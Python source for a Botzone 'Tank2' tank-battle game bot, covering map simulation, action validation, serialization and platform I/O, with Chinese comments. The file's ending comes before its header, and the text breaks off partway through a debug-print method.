_wrapper.__memory__ # debug_print(_memory.keys(), len(_memory)) # debug_print(sys.getsizeof(_memory)) return res # @override def make_decision(self): """ 如果有的玩家无法决策,那么就将其行为设为 Action.STAY 事实上这种情况是不应该出现的,但是为了防止出错,此处对决策结果进行检查 """ player1 = self._player1 player2 = self._player2 action1, action2 = self._make_decision() if not player1.is_handled(action1): action1 = Action.STAY if not player2.is_handled(action2): action2 = Action.STAY return [ action1, action2 ] #{ END 'team.py' }# #{ BEGIN 'stream.py' }# class BotzoneIstream(object): def read(self): return input() class BotzoneOstream(object): def write(self, data): print(data) #{ END 'stream.py' }# #{ BEGIN 'botzone.py' }# class Botzone(object): def __init__(self, long_running): self._longRunning = long_running self._data = None self._globalData = None self._requests = [] # 对方的决策 self._responses = [] # 己方的决策 @property def data(self): return self._data @property def globalData(self): return self._globalData @property def requests(self): return self._requests @property def responses(self): return self._responses def handle_input(self, stream): """ 解析输入信息 Input: - stream TextIOWrapper 输入流对象,必须实现 read 方法 """ inputJSON = json.loads(stream.read()) self._requests = inputJSON["requests"] self._responses = inputJSON["responses"] self._data = inputJSON.get("data", None) self._globalData = inputJSON.get("globaldata", None) def make_output(self, stream, response, debug, data, globaldata): """ 输出结果 Input: - stream TextIOWrapper 输出流对象,必须实现 write 方法 - response dict Bot 此回合的输出信息 - debug dict/str 调试信息,将被写入log,最大长度为1KB - data dict Bot 此回合的保存信息,将在下回合输入 - globaldata dict Bot 的全局保存信息,将会在下回合输入, 对局结束后也会保留,下次对局可以继续利用 """ stream.write(json.dumps({ "response": response, "debug": debug, "data": data, "globaldata": globaldata, })) if not self._longRunning: sys.exit(0) class Tank2Botzone(Botzone, metaclass=SingletonMeta): def __init__(self, map, long_running=False): super().__init__(long_running) self._mySide = -1 self._map = map self._pastActions = { # 由 requests, responses 解析而来的历史动作记录 (side, id_): [] for side in range(SIDE_COUNT) for id_ in range(TANKS_PER_SIDE) } @property def turn(self): return self._map.turn @property def mySide(self): return self._mySide def _parse_field_points(self, binary): """ 解析 requests 中存在有某种类型 field 的坐标 Input: - binary list 某种类型 field 的 binary 标记 Yield: - (x, y) tuple(int, int) 这个坐标上存在该类型 field """ _MAP_WIDTH = self._map.width for i in range(3): mask = 1 for y in range(i * 3, i * 3 + 3): for x in range(_MAP_WIDTH): if binary[i] & mask: yield (x, y) mask <<= 1 def handle_input(self, stream=sys.stdin): super().handle_input(stream) if self._data is not None: self._data = DataSerializer.deserialize(self._data) if self._globalData is not None: try: self._globalData = DataSerializer.deserialize(self._globalData) except Exception as e: self._globalData = None assert len(self._requests) - len(self._responses) == 1 # 带 header header = self._requests.pop(0) # 此时 header 被去掉 self._mySide = header["mySide"] assert self._mySide in (0, 1), "unexpected mySide %s" % self._mySide for key, _Field in [("brickfield", BrickField), ("steelfield", SteelField), ("waterfield", WaterField),]: for x, y in self._parse_field_points(header[key]): self._map.insert_field(_Field(x, y)) if self._mySide == 0: allBlueActions = self._responses allRedActions = self._requests elif self._mySide == 1: allBlueActions = self._requests allRedActions = self._responses for blueActions, redActions in zip(allBlueActions, allRedActions): self._map.perform(blueActions, redActions) if not len(allBlueActions) == 0 and not len(allRedActions) == 0: b0, b1 = zip(*allBlueActions) r0, r1 = zip(*allRedActions) self._pastActions = { # { (side, id): [Action] } (0, 0): b0, (0, 1): b1, (1, 0): r0, (1, 1): r1, } def make_output(self, actions, stream=sys.stdout, debug=None, data=None, globaldata=None): if data is not None: data = DataSerializer.serialize(data) if globaldata is not None: globaldata = DataSerializer.serialize(globaldata) super().make_output(stream, actions, debug, data, globaldata) def get_past_actions(self, side, id): """ 获得某一坦克的历史决策 """ return self._pastActions.get( (side, id), [] ) # 没有记录则抛出 [] #{ END 'botzone.py' }# #{ BEGIN 'main.py' }# def main(istream=None, ostream=None): map_ = Tank2Map(MAP_WIDTH, MAP_HEIGHT) # Singleton terminal = Tank2Botzone(map_, long_running=LONG_RUNNING_MODE) # Singleton istream = istream or BotzoneIstream() ostream = ostream or BotzoneOstream() while True: t1 = time.time() if LONG_RUNNING_MODE: # 这个模式下 map 对象会复用,首先需要重置 map_.reset() terminal.handle_input(stream=istream) if SIMULATOR_ENV: map_.debug_print_out() if terminal.data is not None: memory = terminal.data["memory"] else: memory = { BLUE_SIDE: None, RED_SIDE: None, } side = terminal.mySide tanks = map_.tanks bluePlayer0 = Tank2Player(tanks[BLUE_SIDE][0], map_) bluePlayer1 = Tank2Player(tanks[BLUE_SIDE][1], map_) redPlayer0 = Tank2Player(tanks[RED_SIDE][0], map_) redPlayer1 = Tank2Player(tanks[RED_SIDE][1], map_) bluePlayers = [bluePlayer0, bluePlayer1] redPlayers = [redPlayer0, redPlayer1] bluePlayer0.set_teammate(bluePlayer1) bluePlayer1.set_teammate(bluePlayer0) redPlayer0.set_teammate(redPlayer1) redPlayer1.set_teammate(redPlayer0) bluePlayer0.set_opponents(redPlayers) bluePlayer1.set_opponents(redPlayers) redPlayer0.set_opponents(bluePlayers) redPlayer1.set_opponents(bluePlayers) blueTeam = Tank2Team(BLUE_SIDE, bluePlayer0, bluePlayer1, map_) redTeam = Tank2Team(RED_SIDE, redPlayer0, redPlayer1, map_) blueTeam.set_opponent_team(redTeam) redTeam.set_opponent_team(blueTeam) blueTeam.load_memory(memory[BLUE_SIDE]) redTeam.load_memory(memory[RED_SIDE]) blueTeam.set_previous_actions([ terminal.get_past_actions(BLUE_SIDE, bluePlayer0.id), terminal.get_past_actions(BLUE_SIDE, bluePlayer1.id), ]) redTeam.set_previous_actions([ terminal.get_past_actions(RED_SIDE, redPlayer0.id), terminal.get_past_actions(RED_SIDE, redPlayer1.id), ]) if side == BLUE_SIDE: myPlayer0 = bluePlayer0 myPlayer1 = bluePlayer1 myPlayers = bluePlayers myTeam = blueTeam oppPlayers = redPlayers oppTeam = redTeam elif side == RED_SIDE: myPlayer0 = redPlayer0 myPlayer1 = redPlayer1 myPlayers = redPlayers myTeam = redTeam oppPlayers = bluePlayers oppTeam = blueTeam else: raise Exception("unexpected side %s" % side) actions = myTeam.make_decision() if SIMULATOR_ENV: allStatus = [ player.get_status().copy() for player in myPlayers ] allLabels = [ player.get_labels().copy() for player in myPlayers ] if SIMULATOR_ENV: oppActions = oppTeam.make_decision() oppAllStatus = [ player.get_status().copy() for player in oppPlayers ] oppAllLabels = [ player.get_labels().copy() for player in oppPlayers ] if SIMULATOR_ENV: _CUT_OFF_RULE = "-" * 20 _SIDE_NAMES = ["Blue", "Red"] simulator_print("Decisions for next turn:") simulator_print(_CUT_OFF_RULE) def _print_decision(actions, side, allStatus, allLabels): for id_, action in enumerate(actions): _output = "%-4s %02d: %-11s [status] %s" % ( _SIDE_NAMES[side], id_+1, Action.get_name(action), ", ".join( Status.get_name(status) for status in allStatus[id_] ), ) if allLabels[id_]: _output += " [label] %s" % ( ", ".join( Label.get_name(label) for label in allLabels[id_] ) ) simulator_print(_output) _print_decision(actions, side, allStatus, allLabels) _print_decision(oppActions, 1-side, oppAllStatus, oppAllLabels) simulator_print(_CUT_OFF_RULE) simulator_print("Actually actions on this turn:") simulator_print(_CUT_OFF_RULE) for side, tanks in enumerate(map_.tanks): for id_, tank in enumerate(tanks): simulator_print("%s %02d: %s" % (_SIDE_NAMES[side], id_+1, Action.get_name(tank.previousAction))) simulator_print(_CUT_OFF_RULE) t2 = time.time() data = { "memory": [ blueTeam.dump_memory(), redTeam.dump_memory() ], } debugInfo = { "time": round(t2-t1, 4), "storage": sys.getsizeof(DataSerializer.serialize(data)) } terminal.make_output(actions, stream=ostream, debug=debugInfo, data=data) if __name__ == '__main__': main() #{ END 'main.py' }#
# -*- coding: utf-8 -*- # @author: Rabbit # @filename: botzone_tank2.py # @date: 2019-05-29 21:31:38 # @site: https://github.com/zhongxinghong/Botzone-Tank2 # @description: Automatically built Python single-file script for Botzone/Tank2 game """ MIT License Copyright (c) 2019 Rabbit Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ #{ BEGIN 'const.py' }# #----------------------# # Environment Variable # #----------------------# DEBUG_MODE = False LONG_RUNNING_MODE = False SIMULATOR_ENV = False COMPACT_MAP = False SIMULATOR_PRINT = True #-------------# # Game Config # #-------------# MAP_HEIGHT = 9 MAP_WIDTH = 9 SIDE_COUNT = 2 TANKS_PER_SIDE = 2 #-------------# # Game Status # #-------------# GAME_STATUS_NOT_OVER = -2 GAME_STATUS_DRAW = -1 GAME_STATUS_BLUE_WIN = 0 GAME_STATUS_RED_WIN = 1 BLUE_SIDE = 0 RED_SIDE = 1 #{ END 'const.py' }# #{ BEGIN 'global_.py' }# import time import sys import types import json import random import pickle import base64 import gzip import hashlib import numpy as np from collections import deque from pprint import pprint import functools from contextlib import contextmanager from copy import deepcopy #{ END 'global_.py' }# #{ BEGIN 'utils.py' }# _null_func = lambda *args, **kwargs: None if DEBUG_MODE: debug_print = print debug_pprint = pprint else: debug_print = _null_func debug_pprint = _null_func if SIMULATOR_ENV and SIMULATOR_PRINT: simulator_print = print simulator_pprint = pprint else: simulator_print = _null_func simulator_pprint = _null_func @contextmanager def outer_label(): """ 用于直接打断外层循环,或者继续外层循环 如果置于循环体之外,就是 break outer 如果置于循环体之内,就是 continue outer """ class _GotoOuterException(Exception): pass try: yield _GotoOuterException() # 每次创建后都不相同,嵌套的情况下,需要确保名称不相同 except _GotoOuterException: # 这样做是为了防止嵌套的情况下,无法从内层直接跳到最外层 pass class _Missing(object): """ from werkzeug._internal """ def __repr__(self): return 'no value' def __reduce__(self): return '_missing' _MISSING = _Missing() class CachedProperty(property): """ from werkzeug.utils """ def __init__(self, func, name=None, doc=None): self.__name__ = name or func.__name__ self.__module__ = func.__module__ self.__doc__ = doc or func.__doc__ self.func = func def __set__(self, obj, value): obj.__dict__[self.__name__] = value def __get__(self, obj, type=None): if obj is None: return self value = obj.__dict__.get(self.__name__, _MISSING) if value is _MISSING: value = self.func(obj) obj.__dict__[self.__name__] = value return value @staticmethod def clean(obj, key): """ 清除缓存 """ obj.__dict__.pop(key, None) def memorize(func): """ 根据参数列表缓存函数的返回值的修饰器 ------------------------------------ 1. func 会以 __memory__ 缓存返回结果 2. func 会带上 make_key 方法,可以用来获取传入参数列表对应的缓存 key 3. func 会带上 clear_memory 方法,可以清空所有的缓存结果 4. 如果返回值是生成器,会立即获得完整结果并转为 tuple 类型 这个函数主要用于缓存搜索路径 """ def _make_key(func, *args, **kwargs): _key = ( func.__module__, func.__name__, args, sorted(kwargs.items()) # kwargs 自动排序 ) return hashlib.md5(pickle.dumps(_key)).hexdigest() def _clear_memory(func): if hasattr(func, "__memory__"): func.__memory__.clear() @functools.wraps(func) def wrapper(*args, **kwargs): if not hasattr(func, "__memory__"): func.__memory__ = {} key = _make_key(func, *args, **kwargs) res = func.__memory__.get(key, _MISSING) if res is _MISSING: res = func(*args, **kwargs) if isinstance(res, types.GeneratorType): res = list(res) # 如果返回结果是生成器,那么马上获得所有结果 func.__memory__[key] = res return res wrapper.make_key = functools.partial(_make_key, func) wrapper.clear_memory = functools.partial(_clear_memory, func) return wrapper class SingletonMeta(type): """ Singleton Metaclass @link https://github.com/jhao104/proxy_pool/blob/428359c8dada998481f038dbdc8d3923e5850c0e/Util/utilClass.py """ _instance = {} def __call__(cls, *args, **kwargs): if cls not in cls._instance: cls._instance[cls] = super(SingletonMeta, cls).__call__(*args, **kwargs) return cls._instance[cls] class UniqueIntEnumMeta(type): """ 使得枚举类内所有的 int 值都增加一个 __offset__ 偏移量 使得不同的枚举类可以用同样的 int 值申明 case,但是不同枚举类间,实际的属性值不同不同 需要在类属性中通过 __offset__ 值申明偏移量 """ def __new__(cls, name, bases, attrs): offset = attrs.get("__offset__", 0) # 默认为 0 for k, v in attrs.items(): if isinstance(v, int): attrs[k] += offset return super(UniqueIntEnumMeta, cls).__new__(cls, name, bases, attrs) class DataSerializer(object): @staticmethod def _unpad(s): return s.rstrip("=") @staticmethod def _pad(s): return s + "=" * ( 4 - len(s) % 4 ) @staticmethod def serialize(obj): return __class__._unpad( base64.b64encode( gzip.compress( pickle.dumps(obj))).decode("utf-8")) @staticmethod def deserialize(s): return pickle.loads( gzip.decompress( base64.b64decode( __class__._pad(s).encode("utf-8")))) #{ END 'utils.py' }# #{ BEGIN 'action.py' }# class Action(object): # 空与无效 DUMMY = -3 # 额外添加的 INVALID = -2 # 停止 STAY = -1 # 移动 MOVE_UP = 0 MOVE_RIGHT = 1 MOVE_DOWN = 2 MOVE_LEFT = 3 # 射击 SHOOT_UP = 4 SHOOT_RIGHT = 5 SHOOT_DOWN = 6 SHOOT_LEFT = 7 # 根据 action 的值判断移动方向和射击方向 DIRECTION_OF_ACTION_X = ( 0, 1, 0, -1 ) DIRECTION_OF_ACTION_Y = ( -1, 0, 1, 0 ) DIRECTION_OF_ACTION_XY = ( (0,-1), (1,0), (0,1), (-1,0) ) # 方便用于迭代 MOVE_ACTIONS = ( MOVE_UP, MOVE_RIGHT, MOVE_DOWN, MOVE_LEFT ) SHOOT_ACTIONS = ( SHOOT_UP, SHOOT_RIGHT, SHOOT_DOWN, SHOOT_LEFT ) VALID_ACTIONS = ( STAY, ) + MOVE_ACTIONS + SHOOT_ACTIONS _ACTION_NAMES = [ "Invalid", "Stay", "Up Move", "Right Move", "Down Move", "Left Move", "Up Shoot", "Right Shoot", "Down Shoot", "Left Shoot", ] @staticmethod def is_valid(action): # 是否为有效行为 return -1 <= action <= 7 @staticmethod def is_stay(action): # 是否为停止行为 return action == -1 @staticmethod def is_move(action): # 是否为移动行为 return 0 <= action <= 3 @staticmethod def is_shoot(action): # 是否为射击行为 return 4 <= action <= 7 @staticmethod def is_opposite(action1, action2): """ 两个行动方向是否相对 """ if action1 == -1 or action2 == -1: return False return action1 % 4 == (action2 + 2) % 4 @staticmethod def is_same_direction(action1, action2): """ 两个行动方向是否相同 """ if action1 == -1 or action2 == -1: return False return action1 % 4 == action2 % 4 @staticmethod def get_action(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 的 move 行为值 可以不相邻! """ dx = np.sign(x2 - x1) dy = np.sign(y2 - y1) if dx == dy == 0: return -1 # STAY for idx, dxy in enumerate(__class__.DIRECTION_OF_ACTION_XY): if (dx, dy) == dxy: return idx else: raise Exception("can't move from (%s, %s) to (%s, %s) in one turn" % (x1, y1, x2, y2) ) @staticmethod def get_move_action(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 的射击行为 这个就是对 get_action 的命名,这出于历史遗留问题 ... """ return __class__.get_action(x1, y1, x2, y2) @staticmethod def get_shoot_action(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 的射击行为 """ return __class__.get_action(x1, y1, x2, y2) + 4 @staticmethod def get_name(action): return __class__._ACTION_NAMES[action + 2] #{ END 'action.py' }# #{ BEGIN 'field.py' }# class Field(object): DUMMY = -1 EMPTY = 0 BRICK = 1 STEEL = 2 WATER = 3 #-----------------------# # rule: BASE + 1 + side # #-----------------------# BASE = 4 # side = -1 BLUE_BASE = 5 # side = 0 RED_BASE = 6 # side = 1 #-----------------------# # rule: TANK + 1 + side # #-----------------------# TANK = 7 # side = -1 BLUE_TANK = 8 # side = 0 RED_TANK = 9 # side = 1 MULTI_TANK = 10 def __init__(self, x, y, type): self.x = x self.y = y self.type = type self.destroyed = False @property def xy(self): return (self.x, self.y) @property def yx(self): return (self.y, self.x) def __repr__(self): return "%s(%d, %d)" % ( self.__class__.__name__, self.x, self.y) class EmptyField(Field): def __init__(self, x, y): super().__init__(x, y, Field.EMPTY) class BrickField(Field): def __init__(self, x, y): super().__init__(x, y, Field.BRICK) class SteelField(Field): def __init__(self, x, y): super().__init__(x, y, Field.STEEL) class WaterField(Field): def __init__(self, x, y): super().__init__(x, y, Field.WATER) class BaseField(Field): def __init__(self, x, y, side): super().__init__(x, y, Field.BASE) self._side = side @property def side(self): return self._side def __repr__(self): return "%s(%d, %d, %d)" % ( self.__class__.__name__, self.x, self.y, self._side) class TankField(Field): def __init__(self, x, y, side, id): super().__init__(x, y, Field.TANK) self._side = side self._id = id self.previousAction = Action.DUMMY @property def side(self): return self._side @property def id(self): return self._id def __repr__(self): return "%s(%d, %d, %d, %d)" % ( self.__class__.__name__, self.x, self.y, self._side, self._id) # const BASE_FIELD_TYPES = ( Field.BASE, Field.BLUE_BASE, Field.RED_BASE ) TANK_FIELD_TYPES = ( Field.TANK, Field.BLUE_TANK, Field.RED_TANK, Field.MULTI_TANK ) #{ END 'field.py' }# #{ BEGIN 'map_.py' }# class Map(object): def __init__(self, width, height): self._width = width self._height = height self._content = [ [[] for x in range(width)] for y in range(height) ] @property def width(self): return self._width @property def height(self): return self._height @property def size(self): return (self._width, self._height) def in_map(self, x, y): """ 判断 (x, y) 坐标是否位于地图内 """ return 0 <= x < self._width and 0 <= y < self._height def __getitem__(self, xy): """ 获得 xy: (x, y) 的内容 """ x, y = xy if not self.in_map(x, y): raise Exception("(%s, %s) is not in map" % (x, y) ) return self._content[y][x] def get_fields(self, x, y): return self[x, y] class Tank2Map(Map, metaclass=SingletonMeta): class _Counter(object): """ 一个用于回滚计数的内部类 """ def __init__(self): self._counter = 0 def increase(self): self._counter += 1 def __iter__(self): return iter(range(self._counter)) def __repr__(self): return self._counter.__repr__() def __int__(self): return self._counter def __init__(self, width, height): super().__init__(width, height) self._tanks = [ [ None for _ in range(TANKS_PER_SIDE) ] for __ in range(SIDE_COUNT) ] self._bases = [ None for _ in range(SIDE_COUNT) ] self._turn = 0 self._destroyedRecords = [] # Stack([Record]) 记录被摧毁的 fields 用于回滚 # struct Record: ( # turn: int, # xy: (int, int), # field: Field, # ) self._previousActions = [] # Stack([ [[int, int], [int, int]] ]) 所有坦克的历史动作记录,用于回滚 self._performedActionsRecord = {} # turn -> [[int, int], [int, int]] 记录 perform 所执行过的动作,用于 undo_revert self._init_bases() self._init_tanks() # ----------------------- #self._revertStack = [] # [debug] 保存需要 revert 的行为 #self._revertIdx = 0 # [debug] 当前 revert 的编号 def reset(self): # 重置整个地图 self.__clean_cache() width, height = self.size self.__init__(width, height) def __clean_cache(self): # 清除缓存属性 #CachedProperty.clean(self, "matrix") #CachedProperty.clean(self, "matrix_T") pass # 不再使用缓存啦 @property def turn(self): # 当前回合数 return self._turn @property def tanks(self): return self._tanks @property def bases(self): return self._bases #@CachedProperty # 缓存效果不明显 @property def matrix(self): """ 缓存 to_type_matrix 的值 WARNING: - 因为 list 是可变对象,因此不要对返回值进行修改,以免缓存的属性值改变 - 如需修改,需要首先调用 np.copy(matrix) 获得一个副本,然后对副本进行修改 """ return self.to_type_matrix() #@CachedProperty # 缓存效果不明显 @property def matrix_T(self): return self.matrix.T def _init_bases(self): """ 初始化基地和基地前的钢墙 """ assert self._width % 2 == 1, "Map width must be odd" xc = self._width // 2 # x-center y1 = 0 y2 = self._height - 1 basePoints = [ (xc, y1), # side 1 蓝方 (xc, y2), # side 2 红方 ] for side, (x, y) in enumerate(basePoints): base = BaseField(x, y, side) self._bases[side] = base self.insert_field(base) def _init_tanks(self): """ 初始化坦克 """ x1, x2 = (2, 6) y1, y2 = (0, self._height-1) tankPoints = [ [ (x1, y1), (x2, y1) ], # side 1 蓝方 左 0 右 1 [ (x2, y2), (x1, y2) ], # side 2 红方 左 1 右 0 ] for side, points in enumerate(tankPoints): tanks = self._tanks[side] for idx, (x, y) in enumerate(points): tank = TankField(x, y, side, idx) self.insert_field(tank) tanks[idx] = tank def insert_field(self, field): self[field.xy].append(field) field.destroyed = False def remove_field(self, field, record=True): self[field.xy].remove(field) field.destroyed = True if record: # 记录被清楚的对象 r = ( self._turn, field.xy, field ) self._destroyedRecords.append(r) def to_type_matrix(self): """ 转化成以 field.type 值表示的地图矩阵 Return: - matrix np.array( [[int]] ) 二维的 type 值矩阵 WARNING: - 矩阵的索引方法为 (y, x) ,实际使用时通常需要转置一下,使用 matrix.T """ width, height = self.size matrix = np.full((height, width), Field.DUMMY, dtype=np.int8) for y in range(height): for x in range(width): fields = self.get_fields(x, y) if len(fields) == 0: matrix[y, x] = Field.EMPTY elif len(fields) > 2: matrix[y, x] = Field.MULTI_TANK # 重合视为一个坦克 else: field = fields[0] if isinstance(field, (BaseField, TankField) ): matrix[y, x] = field.type + 1 + field.side # 遵循 Field 中常数定义的算法 else: matrix[y, x] = field.type return matrix def has_multi_tanks(self, x, y): """ 判断某坐标点是否有多辆坦克堆叠 """ return len( self.get_fields(x, y) ) > 1 def is_valid_move_action(self, tank, action): """ 判断是否为合法的移动行为 """ #assert Action.is_move(action), "action %s is not a move-action" % action if not Action.is_move(action): # 因为模拟地图导致了一些不可测的结果,这个地方不能 assert return False # 只要打一个补丁,开发的时候自己注意一下就好,记得 action % 4 _FIELDS_CAN_MOVE_TO = ( Field.DUMMY, Field.EMPTY ) # 遇到坦克不能移动! x, y = tank.xy dx, dy = Action.DIRECTION_OF_ACTION_XY[action] x += dx y += dy if not self.in_map(x, y): return False fields = self.get_fields(x, y) if len(fields) == 0: return True elif len(fields) == 1: _type = fields[0].type if _type in _FIELDS_CAN_MOVE_TO: return True return False def is_valid_shoot_action(self, tank, action): """ 判断是否为合法的设计行为 """ # assert Action.is_shoot(action), "action %s is not a shoot-action" % action if not Action.is_shoot(action): return False return not Action.is_shoot(tank.previousAction) # 只要不连续两回合射击都合理 def is_valid_action(self, tank, action): """ 判断是否为合法行为 """ if not Action.is_valid(action): return False elif Action.is_stay(action): return True elif Action.is_move(action): return self.is_valid_move_action(tank, action) elif Action.is_shoot(action): return self.is_valid_shoot_action(tank, action) else: # 未知的行为 raise Exception("unexpected action %s" % action) def perform(self, blue_actions, red_actions): """ 执行一回合的行为 Input: - blue_actions [int, int] 蓝方 0, 1 号坦克将执行的动作 - red_actions [int, int] 红方 0, 1 号坦克将执行的动作 """ self._turn += 1 self.__clean_cache() #debug_print("Start Turn: %s" % self._turn) #self.debug_print_out("") _dx = Action.DIRECTION_OF_ACTION_X _dy = Action.DIRECTION_OF_ACTION_Y _actions = [ blue_actions, red_actions ] self._performedActionsRecord[self._turn] = _actions _fieldsToBeDestroyed = set() # 使用 set 避免重复 # 记录老的 previous actions _oldPreviousActions = [ [ tank.previousAction for tank in tanks ] for tanks in self._tanks ] self._previousActions.append(_oldPreviousActions) # 记录 # 检查 actions 合理性,修改 tank 缓存 for tanks in self._tanks: for tank in tanks: action = _actions[tank.side][tank.id] if not self.is_valid_action(tank, action): raise Exception("%s will perform an invalid action %s" % (tank, action) ) tank.previousAction = action # 缓存本次行为,不考虑坦克是否已经挂掉 # 处理停止和移动 for tanks in self._tanks: for tank in tanks: action = _actions[tank.side][tank.id] if not tank.destroyed and Action.is_move(action): self.remove_field(tank) tank.x += _dx[action] tank.y += _dy[action] self.insert_field(tank) # 处理射击行为 for tanks in self._tanks: for tank in tanks: action = _actions[tank.side][tank.id] if not tank.destroyed and Action.is_shoot(action): x, y = tank.xy action -= 4 # 使之与 dx, dy 的 idx 对应 while True: x += _dx[action] y += _dy[action] if not self.in_map(x, y): break currentFields = self.get_fields(x, y) if len(currentFields) == 0: continue elif len(currentFields) > 1: # 必定都是 tank pass else: # len(currentFields) == 1 field = currentFields[0] if isinstance(field, (WaterField, EmptyField)): continue # 跳过水路和空格 elif ( isinstance(field, TankField) and not self.has_multi_tanks(x, y) and not self.has_multi_tanks(*field.xy) ): # 对射判断,此时两方所在格子均都只有一架坦克 oppTank = field oppAction = _actions[oppTank.side][oppTank.id] if ( Action.is_shoot(oppAction) and Action.is_opposite(action, oppAction) ): break # 对射抵消 else: pass # 坦克被摧毁 elif isinstance(field, SteelField): break # 钢墙无法摧毁 elif isinstance(field, (BrickField, BaseField) ): pass # 基地和土墙可以被摧毁 else: raise Exception("unexpected field type") _fieldsToBeDestroyed.update(currentFields) break # 摧毁了第一个遇到的 fields for field in _fieldsToBeDestroyed: self.remove_field(field) #debug_print("End Turn: %s" % self._turn) #self.debug_print_out() def single_simulate(self, tank, action): """ 模拟一回合: 其中一架 tank 执行一个特定行为,其他 tank 均不动 模拟结束后,会自动回滚 Input: - tank TankField/BattleTank 能表明坐标的 tank 对象 - action int 下回合的行动 """ actions = [ [Action.STAY for _ in range(TANKS_PER_SIDE) ] for __ in range(SIDE_COUNT) ] actions[tank.side][tank.id] = action self.perform(*actions) def multi_simulate(self, *actions): """ 模拟一回合: 其中指定的多架坦克执行特定行为,其他 tank 均不动 模拟结束后,会自动回滚 Input: - *args 格式为 ( (Tank, action), (Tank, action), ... ) Tank 对象要求包含 side/id 属性 """ performedActions = [ [Action.STAY for _ in range(TANKS_PER_SIDE) ] for __ in range(SIDE_COUNT) ] for tank, action in actions: performedActions[tank.side][tank.id] = action self.perform(*performedActions) def revert(self): """ 回滚一回合的行为 Return: - success bool """ if self._turn <= 0: # 可以为 1 ,此时回滚到 Turn 0 的结束点 return False # 这表示回到地图最初的状态 currentTurn = self._turn records = self._destroyedRecords _actions = self._previousActions.pop() for side, tanks in enumerate(self._tanks): # 回滚历史动作 for id_, tank in enumerate(tanks): tank.previousAction = _actions[side][id_] while len(records) > 0: if records[-1][0] == currentTurn: turn, (x, y), field = records.pop() if isinstance(field, TankField): tank = field if not tank.destroyed: # tank 发生移动 self.remove_field(tank, record=False) tank.x = x tank.y = y self.insert_field(tank) else: self.insert_field(field) else: break self._turn -= 1 self.__clean_cache() #debug_print("Revert to Turn: %s" % self._turn) # 至 turn 的结束状态 #self.debug_print_out() return True def undo_revert(self): """ 从当前回合主动回滚到之前回合后,再将 revert 这个动作撤销 """ nextTurn = self._turn + 1 assert nextTurn in self._performedActionsRecord, "no previously revert operation found" actions = self._performedActionsRecord[nextTurn] self.perform(*actions) @contextmanager def simulate_one_action(self, tank, action): """ simulate 的 with 版用法,结束后会自动回滚 """ try: self.single_simulate(tank, action) #debug_print("simulate:", tank, action) #self._revertIdx += 1 #self._revertStack.append( (self._revertIdx, tank, action) ) yield except Exception as e: raise e finally: self.revert() # 不管出于什么错误,模拟结束后必定回滚 #self._revertStack.pop() #debug_print("revert:", tank, action) @contextmanager def simulate_multi_actions(self, *actions): """ multi_simulate 的 with 用法 """ try: self.multi_simulate(*actions) yield except Exception as e: raise e finally: self.revert() @contextmanager def rollback_to_previous(self): """ 回滚到先前回合 回滚结束后,会自动撤销回滚 """ try: success = self.revert() yield except Exception as e: raise e finally: if success: self.undo_revert() # 回合结束后撤销回滚 @contextmanager def auto_revert(self): """ 自动实现多轮回滚 可以在 yield 后连续不定次调用 single_simulate/multi_simulate 函数, 模拟结束后自动调用 counter 次 revert 来自动多轮回滚 yield 后可以通过调用 cnt.increase 来增加回滚次数 """ try: cnt = self.__class__._Counter() yield cnt # 每成功调用一次 map_.simulate 就需要调用一次 increase except Exception as e: raise finally: for _ in cnt: self.revert() @contextmanager def auto_undo_revert(self): """ 同上,但会在结束时通过调用 counter 次 undo_revert 来实现多轮 revert 操作的回滚 """ try: cnt = self.__class__._Counter() yield cnt # 每成功调用一次 map_.revert 就需要调用一次 increase except Exception as e: raise finally: for _ in cnt: self.undo_revert() def get_game_result(self): """ 判断胜利方 Return: - result int 比赛结果 > GAME_STATUS_NOT_OVER 比赛尚未结束 > GAME_STATUS_DRAW 平局 > GAME_STATUS_BLUE_WIN 蓝方获胜 > GAME_STATUS_RED_WIN 红方获胜 """ failed = [ False for _ in range(SIDE_COUNT) ] # 0 蓝方 1 红方 for side in range(SIDE_COUNT): # 坦克全部被消灭 tanks = self._tanks[side] if all(tank.destroyed for tank in tanks): failed[side] = True # 基地被摧毁 baes = self._bases[base] if base.destroyed: failed[side] = True if failed[0] and failed[1]: return GAME_STATUS_DRAW elif not failed[0] and failed[1]: return GAME_STATUS_BLUE_WIN elif failed[0] and not failed[1]: return GAME_STATUS_RED_WIN else: return GAME_STATUS_NOT_OVER def debug_print_out(self, compact=COMPACT_MAP): """ [DEBUG] 输出整个地图 Input: - compact bool 是否以紧凑的形式输出 """ if not DEBUG_MODE: return EMPTY_SYMBOL = " " BASE_SYMBOL = "基" BRICK_SYMBOL = "土" STEEL_SYMBOL = "钢" WATER_SYMBOL = "水" BLUE_TANK_SYMBOL = "蓝" RED_TANK_SYMBOL = "红" MULTI_TANK_SYMBOL = "重" UNEXPECTED_SYMBOL = "?" SPACE = " " if not compact else "" _TEXT_WIDTH = (self._width * 2 - 1) if not compact else self._width CUT_OFF_RULE = "=" * _TEXT_WIDTH print_inline = functools.partial(print, end=SPACE) print("\n%s" % CUT_OFF_RULE) if not compact: print("") for y in range(self._height): for x in range(self._width): fields = self._content[y][x] if len(fields) == 0: print_inline(EMPTY_SYMBOL) elif len(fields) > 1: print_inline(MULTI_TANK_SYMBOL) elif len(fields) == 1: field = fields[0] if isinstance(field, EmptyField): print_inline(EMPTY_SYMBOL) elif isinstance(field, BaseField): print_inline(BASE_SYMBOL) elif isinstance(field, BrickField): print_inline(BRICK_SYMBOL) elif isinstance(field, SteelField): 